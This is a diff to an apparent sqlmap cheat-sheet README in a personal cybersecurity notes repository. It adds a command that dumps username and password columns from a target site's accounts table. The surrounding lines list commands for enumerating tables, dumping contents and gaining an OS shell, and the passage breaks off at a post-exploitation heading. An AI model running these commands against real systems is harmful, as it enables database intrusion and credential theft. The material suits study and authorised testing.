sourojyotibiswas/cybersecurity/sql-map/Readme.md

-sqlmap -u "url?id=1" --batch --tables -D <db>     # List tables in a database sqlmap -u "url?id=1" --batch --dump -T <table> -D <db>  # Dump table contents sqlmap -u "url?id=1" --batch --os-shell           # Gain OS shell if possible
+sqlmap -u "url?id=1" --batch --tables -D <db>     # List tables in a database sqlmap -u "url?id=1" --batch --dump -T <table> -D <db>  # Dump table contents sqlmap -u "url?id=1" --batch --os-shell           # Gain OS shell if possible sqlmap -u "http://target.com/page.php?id=1" --dump -D users -T accounts -C username,password
 ```
+The -C flag in sqlmap is used to specify one or more specific columns to dump from a table, instead of dumping all columns.

 ### Example Post-Exploitation Commands: